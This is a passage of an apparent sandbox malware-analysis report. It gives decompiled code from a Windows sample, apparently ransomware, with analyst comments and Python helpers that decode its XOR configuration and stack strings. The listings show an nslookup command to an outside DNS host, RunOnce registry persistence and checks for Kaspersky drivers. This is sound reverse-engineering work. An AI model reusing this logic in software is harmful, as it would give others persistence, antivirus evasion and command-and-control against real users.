                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				char _v64;
                                        				short _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				char _v124;
                                        				struct _SECURITY_ATTRIBUTES _v136;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t45;
                                        				void* _t57;
                                        				CHAR* _t64;
                                        				void* _t66;
                                        
                                        				_v64 = 0x73006e;
                                        				_t57 = __edx;
                                        				_v8 = 0;
                                        				_t64 = __ecx;
                                        				_v68 = 0;
                                        				_v60 = 0x6f006c;
                                        				_t43 =  !=  ?  &_v124 :  &_v64;
                                        				_v56 = 0x6b006f;
                                        				_a4 =  !=  ?  &_v124 :  &_v64;
                                        				_v52 = 0x700075;
                                        				_v48 = 0x250020;
                                        				_v44 = 0x200053;
                                        				_v40 = 0x6e0064;
                                        				_v36 = 0x310073;
                                        				_v32 = 0x73002e;
                                        				_v28 = 0x70006f;
                                        				_v24 = 0x6f0072;
                                        				_v20 = 0x6e0064;
                                        				_v16 = 0x2e0073;
                                        				_v12 = 0x750072;
                                        				_v124 = 0x73006e;
                                        				_v120 = 0x6f006c;
                                        				_v116 = 0x6b006f;
                                        				_v112 = 0x700075;
                                        				_v108 = 0x250020;
                                        				_v104 = 0x200053;
                                        				_v100 = 0x6e0064;
                                        				_v96 = 0x320073;
                                        				_v92 = 0x73002e;
                                        				_v88 = 0x70006f;
                                        				_v84 = 0x6f0072;
                                        				_v80 = 0x6e0064;
                                        				_v76 = 0x2e0073;
                                        				_v72 = 0x750072;
                                        				_v136.nLength = 0xc;
                                        				_v136.bInheritHandle = 1;
                                        				_v136.lpSecurityDescriptor = 0;
                                        				_t45 = CreatePipe(0xf9e2a70, 0xf9e2a6c,  &_v136, 0);
                                        				if(_t45 != 0) {
                                        					_t45 = SetHandleInformation( *0xf9e2a70, 1, 0);
                                        					if(_t45 == 0) {
                                        						goto L1;
                                        					} else {
                                        						CreatePipe(0xf9e2a68, 0xf9e2a74,  &_v136, 0);
                                        						_t45 = SetHandleInformation( *0xf9e2a74, 1, 0);
                                        						if(_t45 == 0) {
                                        							goto L1;
                                        						} else {
                                        							_t66 = VirtualAlloc(0, 0x2800, 0x3000, 4);
                                        							if(_t66 == 0) {
                                        								lstrcpyA(_t64, "fabian wosar <3");
                                        								return 0;
                                        							} else {
                                        								wsprintfW(_t66, _a4, _t57);
                                        								E0F9D4C40(_t66);
                                        								E0F9D4DE0(_t57, _t64, _t57, _t64, _t66);
                                        								VirtualFree(_t66, 0, 0x8000);
                                        								return 0;
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					L1:
                                        					return _t45 | 0xffffffff;
                                        				}
                                        			}

                                        0x0f9d4e9d
                                        0x0f9d4ea8
                                        0x0f9d4eab
                                        0x0f9d4eaf
                                        0x0f9d4eb1
                                        0x0f9d4ebb
                                        0x0f9d4ec2
                                        0x0f9d4ec5
                                        0x0f9d4ece
                                        0x0f9d4ee2
                                        0x0f9d4ee9
                                        0x0f9d4ef0
                                        0x0f9d4ef7
                                        0x0f9d4efe
                                        0x0f9d4f05
                                        0x0f9d4f0c
                                        0x0f9d4f13
                                        0x0f9d4f1a
                                        0x0f9d4f21
                                        0x0f9d4f28
                                        0x0f9d4f2f
                                        0x0f9d4f36
                                        0x0f9d4f3d
                                        0x0f9d4f44
                                        0x0f9d4f4b
                                        0x0f9d4f52
                                        0x0f9d4f59
                                        0x0f9d4f60
                                        0x0f9d4f67
                                        0x0f9d4f6e
                                        0x0f9d4f75
                                        0x0f9d4f7c
                                        0x0f9d4f83
                                        0x0f9d4f8a
                                        0x0f9d4f91
                                        0x0f9d4f9b
                                        0x0f9d4fa2
                                        0x0f9d4fa9
                                        0x0f9d4fb1
                                        0x0f9d4fcd
                                        0x0f9d4fd1
                                        0x00000000
                                        0x0f9d4fd3
                                        0x0f9d4fe6
                                        0x0f9d4ff6
                                        0x0f9d4ffa
                                        0x00000000
                                        0x0f9d4ffc
                                        0x0f9d5010
                                        0x0f9d5014
                                        0x0f9d5051
                                        0x0f9d505f
                                        0x0f9d5016
                                        0x0f9d501b
                                        0x0f9d5026
                                        0x0f9d502f
                                        0x0f9d503c
                                        0x0f9d504a
                                        0x0f9d504a
                                        0x0f9d5014
                                        0x0f9d4ffa
                                        0x0f9d4fb3
                                        0x0f9d4fb3
                                        0x0f9d4fbc
                                        0x0f9d4fbc

                                        APIs
                                        • CreatePipe.KERNEL32(0F9E2A70,0F9E2A6C,?,00000000,00000001,00000001,00000000), ref: 0F9D4FA9
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F9D4FCD
                                        • CreatePipe.KERNEL32(0F9E2A68,0F9E2A74,0000000C,00000000), ref: 0F9D4FE6
                                        • SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F9D4FF6
                                        • VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F9D500A
                                        • wsprintfW.USER32 ref: 0F9D501B
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D503C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
                                        • String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
                                        • API String ID: 1490407255-3453122116
                                        • Opcode ID: c20d2cf8a3f784cb4cc69dbec90659bb61b0dc030529fe661d70f77e9740d0fc
                                        • Instruction ID: 163e21a783c1a5fa8a35e4008c080839245fdbe60ce28d39c22a4fc74c2d00d9
                                        • Opcode Fuzzy Hash: c20d2cf8a3f784cb4cc69dbec90659bb61b0dc030529fe661d70f77e9740d0fc
                                        • Instruction Fuzzy Hash: 22418270E053189BEB20CF95E8487EDBFB5FB04755F208129E504AB292C7F905988F94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D41D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
                                        				void* _t41;
                                        				void* _t44;
                                        				WCHAR* _t45;
                                        				signed short _t49;
                                        				signed short* _t50;
                                        				signed int _t55;
                                        				signed int _t56;
                                        				void* _t59;
                                        				WCHAR* _t60;
                                        				WCHAR* _t62;
                                        				void* _t65;
                                        
                                        				_t41 = __eax;
                                        				// Decode the 0xa38-byte embedded configuration at 0xf9e2000 in place with a
                                        				// one-byte XOR key (0x05). The 0xfeff annotation further down shows the
                                        				// decoded data is UTF-16 text that starts with a byte-order mark.
                                        				do {
                                        					 *(_t41 + 0xf9e2000) =  *(_t41 + 0xf9e2000) ^ 0x00000005;
                                        					_t41 = _t41 + 1;
                                        				} while (_t41 < 0xa38);
                                        				 *0xf9e2a64 = 0xf9e2000; // global pointer to the decoded configuration
                                        				// Locate the L"{USERID}" placeholder inside the decoded text.
                                        				_t60 = E0F9D8090(0xf9e2000, L"{USERID}");
                                        				if(_t60 != 0) {
                                        					while(1) {
                                        						L4:
                                        						// Patch the placeholder in place: lstrcpyW copies the user ID (_a132) over it,
                                        						// then the terminating NUL that lstrcpyW wrote is replaced by a space so the rest
                                        						// of the configuration text continues after the ID. The buffer is never resized,
                                        						// so an ID shorter than 8 characters leaves the tail of "{USERID}" behind and a
                                        						// longer one overwrites whatever follows the placeholder.
                                        						lstrcpyW(_t60, _t62);
                                        						_t60[lstrlenW(_t60)] = 0x20;
                                        						// Re-scan the whole buffer for another occurrence (inlined wide-string search).
                                        						_t60 = 0xf9e2000;
                                        						_t49 =  *0xf9e2000; // 0xfeff
                                        						if(_t49 == 0) {
                                        							goto L13;
                                        						}
                                        						_t55 = _t49 & 0x0000ffff;
                                        						_t65 = 0xf9e2000 - L"{USERID}";
                                        						do {
                                        							_t50 = L"{USERID}";
                                        							if(_t55 == 0) {
                                        								goto L12;
                                        							} else {
                                        								while(1) {
                                        									_t56 =  *_t50 & 0x0000ffff;
                                        									if(_t56 == 0) {
                                        										break;
                                        									}
                                        									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
                                        									if(_t59 != 0) {
                                        										L11:
                                        										if( *_t50 == 0) {
                                        											break;
                                        										} else {
                                        											goto L12;
                                        										}
                                        									} else {
                                        										_t50 =  &(_t50[1]);
                                        										if( *(_t65 + _t50) != _t59) {
                                        											continue;
                                        										} else {
                                        											goto L11;
                                        										}
                                        									}
                                        									goto L13;
                                        								}
                                        								_t62 = _a132;
                                        								goto L4;
                                        							}
                                        							goto L13;
                                        							L12:
                                        							_t7 =  &(_t60[1]); // 0x2d002d
                                        							_t55 =  *_t7 & 0x0000ffff;
                                        							_t60 =  &(_t60[1]);
                                        							_t65 = _t65 + 2;
                                        						} while (_t55 != 0);
                                        						goto L13;
                                        					}
                                        				}
                                        				L13:
                                        				// Stack string, two UTF-16 code units per DWORD (low word first):
                                        				// "https://www.torproject.org/download/download-easy.html.en"
                                        				_a8 = 0x740068;   // "ht"
                                        				_a12 = 0x700074;  // "tp"
                                        				_a16 = 0x3a0073;  // "s:"
                                        				_a20 = 0x2f002f;  // "//"
                                        				_a24 = 0x770077;  // "ww"
                                        				_a28 = 0x2e0077;  // "w."
                                        				_a32 = 0x6f0074;  // "to"
                                        				_a36 = 0x700072;  // "rp"
                                        				_a40 = 0x6f0072;  // "ro"
                                        				_a44 = 0x65006a;  // "je"
                                        				_a48 = 0x740063;  // "ct"
                                        				_a52 = 0x6f002e;  // ".o"
                                        				_a56 = 0x670072;  // "rg"
                                        				_a60 = 0x64002f;  // "/d"
                                        				_a64 = 0x77006f;  // "ow"
                                        				_a68 = 0x6c006e;  // "nl"
                                        				_a72 = 0x61006f;  // "oa"
                                        				_a76 = 0x2f0064;  // "d/"
                                        				_a80 = 0x6f0064;  // "do"
                                        				_a84 = 0x6e0077;  // "wn"
                                        				_a88 = 0x6f006c;  // "lo"
                                        				_a92 = 0x640061;  // "ad"
                                        				_a96 = 0x65002d;  // "-e"
                                        				_a100 = 0x730061; // "as"
                                        				_a104 = 0x2e0079; // "y."
                                        				_a108 = 0x740068; // "ht"
                                        				_a112 = 0x6c006d; // "ml"
                                        				_a116 = 0x65002e; // ".e"
                                        				_a120 = 0x6e;     // "n" + terminating NUL
                                        				if( *0xf9e2a44 == 0) {
                                        					// Allocate a 0x400-byte buffer once (MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE),
                                        					// cache the pointer in a global and copy the assembled URL into it.
                                        					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        					 *0xf9e2a44 = _t45;
                                        					if(_t45 != 0) {
                                        						wsprintfW(_t45, L"%s",  &_a8);
                                        					}
                                        				}
                                        				VirtualFree(_a128, 0, 0x8000);
                                        				_t44 = E0F9D7C10( &_a136);
                                        				return _t44;
                                        			}

                                        APIs
                                        • lstrcpyW.KERNEL32 ref: 0F9D4212
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4219
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D4385
                                        • wsprintfW.USER32 ref: 0F9D439F
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0F9D43B6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
                                        • String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
                                        • API String ID: 4033391921-3341315666
                                        • Opcode ID: 5e2bc8b57a2e8dd9c989ce577d157cd50c197d538cb3fb0108f7213c47f6e1b2
                                        • Instruction ID: bdef4670d4e6e9611c6fe0d843e6577e2dde8ef92e158d646d22250ee7fdf2a4
                                        • Opcode Fuzzy Hash: 5e2bc8b57a2e8dd9c989ce577d157cd50c197d538cb3fb0108f7213c47f6e1b2
                                        • Instruction Fuzzy Hash: 57419C70508341CBE720DF14C54876ABFE6FB81799F64891CF6880B292D7FA8599CF52
                                        Uniqueness

                                        Uniqueness Score: -1.00%
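
E0F9D41D6 above decodes the embedded configuration with a one-byte XOR and then patches the {USERID} placeholder in place. The Python below is an added model of that loop, not code from the report or from the sample: the key 0x05 and the 0xa38-byte length come from the decompiled loop, the byte-order mark from the decompiler's 0xfeff annotation, and the plaintext used to build the test blob is constructed here (the host name is a reserved test name, not anything from the sample).

```python
"""Model of the configuration decoding in E0F9D41D6 (added example, not the sample's code)."""

XOR_KEY = 0x05        # from: *(_t41 + 0xf9e2000) ^= 0x00000005
CONFIG_LEN = 0xA38    # loop bound: while (_t41 < 0xa38)
PLACEHOLDER = "{USERID}"


def _utf16(s):
    return s.encode("utf-16-le")


def build_sample_blob(plaintext, key=XOR_KEY, length=CONFIG_LEN):
    """Constructed test data: BOM + UTF-16LE text, NUL-padded to the loop length, XORed
    with the key. The BOM mirrors the 0xfeff the decompiler reads at 0xf9e2000."""
    raw = (b"\xff\xfe" + _utf16(plaintext)).ljust(length, b"\x00")
    return bytes(b ^ key for b in raw)


def xor_decode(blob, key=XOR_KEY, length=CONFIG_LEN):
    """The per-byte XOR loop: only the first `length` bytes are touched."""
    return bytes(b ^ key for b in blob[:length]) + blob[length:]


def _find_aligned(buf, needle, start=0):
    """bytes.find() restricted to even offsets so a hit sits on a UTF-16 code-unit boundary."""
    pos = buf.find(needle, start)
    while pos != -1 and pos % 2:
        pos = buf.find(needle, pos + 1)
    return pos


def substitute_userid(decoded, userid):
    """Replicates lstrcpyW(placeholder, userid) followed by writing a space over the NUL.
    Every {USERID} is overwritten in place; the buffer length never changes, so an ID
    shorter than 8 characters leaves the tail of the placeholder behind and a longer
    one clobbers whatever follows it."""
    buf = bytearray(decoded)
    needle = _utf16(PLACEHOLDER)
    patch = _utf16(userid + " ")
    pos = _find_aligned(buf, needle)
    while pos != -1:
        end = min(pos + len(patch), len(buf))   # stay inside the buffer (the malware does not)
        buf[pos:end] = patch[:end - pos]
        pos = _find_aligned(buf, needle, pos + 2)
    return bytes(buf)


def config_text(decoded):
    """Decoded buffer as text: drop the BOM and the NUL padding."""
    return decoded.decode("utf-16-le", errors="replace").lstrip("\ufeff").rstrip("\x00")


if __name__ == "__main__":
    blob = build_sample_blob("id={USERID} url=http://example.invalid/ id2={USERID}")
    decoded = xor_decode(blob)
    print(config_text(decoded))
    print(config_text(substitute_userid(decoded, "ABCDEFGH")))
    print(config_text(substitute_userid(decoded, "1234")))   # shows the leftover "ID}"
```

On a real dump, feed `xor_decode` the 0xa38 bytes at 0xf9e2000 of module 0F9D0000 (the `.sdmp` listed under Memory Dump Source) and leave `substitute_userid` out; the placeholder is what the static blob contains.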

                                        C-Code - Quality: 93%
                                        			E0F9D2960(WCHAR* __ecx, void* __eflags) {
                                        				void* _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				short _v32;
                                        				intOrPtr _v44;
                                        				intOrPtr _v48;
                                        				intOrPtr _v52;
                                        				intOrPtr _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				intOrPtr _v72;
                                        				intOrPtr _v76;
                                        				intOrPtr _v80;
                                        				intOrPtr _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				intOrPtr _v96;
                                        				intOrPtr _v100;
                                        				intOrPtr _v104;
                                        				intOrPtr _v108;
                                        				intOrPtr _v112;
                                        				intOrPtr _v116;
                                        				intOrPtr _v120;
                                        				intOrPtr _v124;
                                        				intOrPtr _v128;
                                        				intOrPtr _v132;
                                        				intOrPtr _v136;
                                        				short _v140;
                                        				WCHAR* _t58;
                                        
                                        				_t58 = __ecx; // value data to write (wide string supplied by the caller)
                                        				// Stack string, two UTF-16 code units per DWORD: "PRIDURASHKA"
                                        				_v32 = 0x520050; // "PR"
                                        				_v28 = 0x440049; // "ID"
                                        				_push(0x41);
                                        				_v24 = 0x520055; // "UR"
                                        				_v20 = 0x530041; // "AS"
                                        				_v16 = 0x4b0048; // "HK"
                                        				_v12 = 0x41;     // "A" + terminating NUL
                                        				// The name buffer and its length are handed to E0F9D8150; the subcall APIs listed
                                        				// below (CryptAcquireContextW, GetProcAddress of CryptGenRandom) show that routine
                                        				// obtains random bytes, so the literal above is not necessarily the name written.
                                        				E0F9D8150( &_v32, lstrlenW( &_v32));
                                        				// Stack string: "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
                                        				_v140 = 0x4f0053; // "SO"
                                        				_v136 = 0x540046; // "FT"
                                        				_v132 = 0x410057; // "WA"
                                        				_v128 = 0x450052; // "RE"
                                        				_v124 = 0x4d005c; // "\M"
                                        				_v120 = 0x630069; // "ic"
                                        				_v116 = 0x6f0072; // "ro"
                                        				_v112 = 0x6f0073; // "so"
                                        				_v108 = 0x740066; // "ft"
                                        				_v104 = 0x57005c; // "\W"
                                        				_v100 = 0x6e0069; // "in"
                                        				_v96 = 0x6f0064;  // "do"
                                        				_v92 = 0x730077;  // "ws"
                                        				_v88 = 0x43005c;  // "\C"
                                        				_v84 = 0x720075;  // "ur"
                                        				_v80 = 0x650072;  // "re"
                                        				_v76 = 0x74006e;  // "nt"
                                        				_v72 = 0x650056;  // "Ve"
                                        				_v68 = 0x730072;  // "rs"
                                        				_v64 = 0x6f0069;  // "io"
                                        				_v60 = 0x5c006e;  // "n\"
                                        				_v56 = 0x750052;  // "Ru"
                                        				_v52 = 0x4f006e;  // "nO"
                                        				_v48 = 0x63006e;  // "nc"
                                        				_v44 = 0x65;      // "e" + terminating NUL
                                        				// HKEY_CURRENT_USER (0x80000001) with KEY_ALL_ACCESS (0xf003f): per-user RunOnce
                                        				// persistence, which needs no elevation.
                                        				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0) != 0) {
                                        					return 0;
                                        				} else {
                                        					// Type 1 = REG_SZ. _t47 is never defined in this listing (decompiler quality 93%);
                                        					// the size argument is the string length plus an unrecovered constant.
                                        					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47);
                                        					asm("sbb esi, esi");
                                        					RegCloseKey(_v8);
                                        					_t39 =  &(_t58[0]); // 0x1
                                        					return _t39;
                                        				}
                                        			}

                                        APIs
                                        • lstrlenW.KERNEL32(00520050,00000041,74CF82B0,00000000), ref: 0F9D299D
                                          • Part of subcall function 0F9D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F9D816D
                                          • Part of subcall function 0F9D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F9D819B
                                          • Part of subcall function 0F9D8150: GetModuleHandleA.KERNEL32(?), ref: 0F9D81EF
                                          • Part of subcall function 0F9D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F9D81FD
                                          • Part of subcall function 0F9D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F9D820C
                                          • Part of subcall function 0F9D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F9D8255
                                          • Part of subcall function 0F9D8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D8263
                                        • RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F9D2C45,00000000), ref: 0F9D2A84
                                        • lstrlenW.KERNEL32(00000000), ref: 0F9D2A8F
                                        • RegSetValueExW.ADVAPI32(0F9D2C45,00520050,00000000,00000001,00000000,00000000), ref: 0F9D2AA4
                                        • RegCloseKey.ADVAPI32(0F9D2C45), ref: 0F9D2AB1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.315641012.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 0000000E.00000002.315632959.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315651936.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315662109.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 0000000E.00000002.315667422.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
                                        • String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
                                        • API String ID: 553367697-3791882466
                                        • Opcode ID: fb18767f14730c885fc456d5cd8ff6945c52713ca969cf888927546bd05e14b1
                                        • Instruction ID: d48cc2fa45286989a46075163706fb35882ddb295905790725ed96fe2a3e69b5
                                        • Opcode Fuzzy Hash: fb18767f14730c885fc456d5cd8ff6945c52713ca969cf888927546bd05e14b1
                                        • Instruction Fuzzy Hash: 5C31EDB090121DDFEB20CF91E948BEDBFB9FB01709F208159D5186A282D7BA4558CF54
                                        Uniqueness

                                        Uniqueness Score: -1.00%
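
The listings in this report (E0F9D41D6, E0F9D2960 and the E0F9D2D30 prologue that follows) build their strings as packed 32-bit immediates, two UTF-16LE code units per DWORD with the low word first. The Python below is an added helper, not part of the Joe Sandbox report or of the sample: it parses such `_aN = 0x…;` / `_vN.field = 0x…;` assignments from decompiler text and reassembles the strings. The embedded input is the assignment lines copied from the three functions on this page.

```python
"""Reassemble UTF-16 stack strings from decompiler output (added example, not report code)."""
import re

# One immediate stored to a stack slot, e.g. `_a8 = 0x740068;` or `_v84.pt = 0;`
ASSIGN_RE = re.compile(r"_[av]\d+(?:\.\w+)?\s*=\s*(0x[0-9A-Fa-f]+|\d+)\s*;")


def dword_to_utf16(value):
    """Split a 32-bit immediate into its two little-endian UTF-16 code units, low word first."""
    return [value & 0xFFFF, (value >> 16) & 0xFFFF]


def decode_stack_strings(decompiled):
    """Walk the assignments in source order; a zero code unit ends the current string.
    Only feed it the region that builds strings: any other immediate (a cbSize, a style
    flag) is decoded as a character too."""
    strings, current = [], []
    for m in ASSIGN_RE.finditer(decompiled):
        literal = m.group(1)
        value = int(literal, 16) if literal.lower().startswith("0x") else int(literal, 10)
        for unit in dword_to_utf16(value):
            if unit == 0:
                if current:
                    strings.append("".join(current))
                    current = []
            else:
                current.append(chr(unit))
    if current:  # unterminated tail (the final NUL store is sometimes folded away)
        strings.append("".join(current))
    return strings


# Assignment lines taken from E0F9D41D6, E0F9D2960 and E0F9D2D30 on this page.
SAMPLE_DECOMPILED = """
_a8 = 0x740068; _a12 = 0x700074; _a16 = 0x3a0073; _a20 = 0x2f002f; _a24 = 0x770077;
_a28 = 0x2e0077; _a32 = 0x6f0074; _a36 = 0x700072; _a40 = 0x6f0072; _a44 = 0x65006a;
_a48 = 0x740063; _a52 = 0x6f002e; _a56 = 0x670072; _a60 = 0x64002f; _a64 = 0x77006f;
_a68 = 0x6c006e; _a72 = 0x61006f; _a76 = 0x2f0064; _a80 = 0x6f0064; _a84 = 0x6e0077;
_a88 = 0x6f006c; _a92 = 0x640061; _a96 = 0x65002d; _a100 = 0x730061; _a104 = 0x2e0079;
_a108 = 0x740068; _a112 = 0x6c006d; _a116 = 0x65002e; _a120 = 0x6e;
_v32 = 0x520050; _v28 = 0x440049; _v24 = 0x520055; _v20 = 0x530041; _v16 = 0x4b0048; _v12 = 0x41;
_v140 = 0x4f0053; _v136 = 0x540046; _v132 = 0x410057; _v128 = 0x450052; _v124 = 0x4d005c;
_v120 = 0x630069; _v116 = 0x6f0072; _v112 = 0x6f0073; _v108 = 0x740066; _v104 = 0x57005c;
_v100 = 0x6e0069; _v96 = 0x6f0064; _v92 = 0x730077; _v88 = 0x43005c; _v84 = 0x720075;
_v80 = 0x650072; _v76 = 0x74006e; _v72 = 0x650056; _v68 = 0x730072; _v64 = 0x6f0069;
_v60 = 0x5c006e; _v56 = 0x750052; _v52 = 0x4f006e; _v48 = 0x63006e; _v44 = 0x65;
_v84.message = 0x6c006b; _v84.wParam = 0x660069; _v84.lParam = 0x73002e; _v84.time = 0x730079; _v84.pt = 0;
_v96 = 0x6c006b; _v92 = 0x2e0031; _v88 = 0x790073; _v84.hwnd = 0x73;
"""

if __name__ == "__main__":
    for s in decode_stack_strings(SAMPLE_DECOMPILED):
        print(repr(s))
```

The decoder relies on source order, which is address order in these listings; struct members such as `_v84.message` are handled by the regex but their layout is not checked, so verify against the struct definition when a string straddles a struct boundary, as "kl1.sys" does here (`_v96`.`_v88` followed by `_v84.hwnd`).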

                                        C-Code - Quality: 84%
                                        			E0F9D2D30() {
                                        				struct _WNDCLASSEXW _v52;
                                        				struct tagMSG _v84;
                                        				intOrPtr _v88;
                                        				intOrPtr _v92;
                                        				char _v96;
                                        				short _t42;
                                        				void* _t49;
                                        				void* _t61;
                                        				void* _t62;
                                        				void* _t67;
                                        				void* _t69;
                                        				long _t71;
                                        
                                        				_push(_t62);
                                        				_push(_t69);
                                        				_v84.message = 0x6c006b;	// UTF-16LE stack string, two code units per DWORD store: "kl"
                                        				_push(_t67);
                                        				_v84.wParam = 0x660069;	// "if"
                                        				_v84.lParam = 0x73002e;	// ".s"
                                        				_v84.time = 0x730079;	// "ys"  -> L"klif.sys" (Kaspersky filter driver)
                                        				_v84.pt = 0;	// NUL terminator
                                        				_v96 = 0x6c006b;	// "kl"
                                        				_v92 = 0x2e0031;	// "1."
                                        				_v88 = 0x790073;	// "sy"
                                        				_v84.hwnd = 0x73;	// "s"  -> L"kl1.sys" (Kaspersky); _v96 .. _v84.hwnd are contiguous stack slots
                                        				if(E0F9D2F50( &(_v84.message)) != 0 || E0F9D2F50( &_v96) != 0) {	// E0F9D2F50: EnumDeviceDrivers + GetDeviceDriverBaseNameW, lstrcmpiW of each loaded driver name against the string (see APIs below)
                                        					L5:
                                        					_v52.cbSize = 0x30;	// sizeof(WNDCLASSEXW) on x86
                                        					_v52.style = 3;	// CS_HREDRAW | CS_VREDRAW
                                        					_v52.lpfnWndProc = E0F9D2C50;
                                        					_v52.cbClsExtra = 0;
                                        					_v52.cbWndExtra = 0;
                                        					_v52.hInstance = GetModuleHandleW(0);
                                        					_v52.hIcon = 0;
                                        					_v52.hCursor = LoadCursorW(0, 0x7f00);	// IDC_ARROW
                                        					_v52.hbrBackground = 6;	// COLOR_WINDOW + 1
                                        					_v52.lpszMenuName = 0;
                                        					_v52.lpszClassName = L"win32app";
                                        					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);	// IDI_APPLICATION
                                        					_t42 = RegisterClassExW( &_v52);
                                        					_push(0);
                                        					if(_t42 != 0) {
                                        						GetModuleHandleW();
                                        						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);	// WS_OVERLAPPEDWINDOW at CW_USEDEFAULT, 5x5 px, titled "firefox"
                                        						SetWindowLongW(_t71, 0xfffffff0, 0);	// GWL_STYLE = 0: strip every window style
                                        						if(_t71 != 0) {
                                        							ShowWindow(_t71, 5);	// SW_SHOW
                                        							UpdateWindow(_t71);
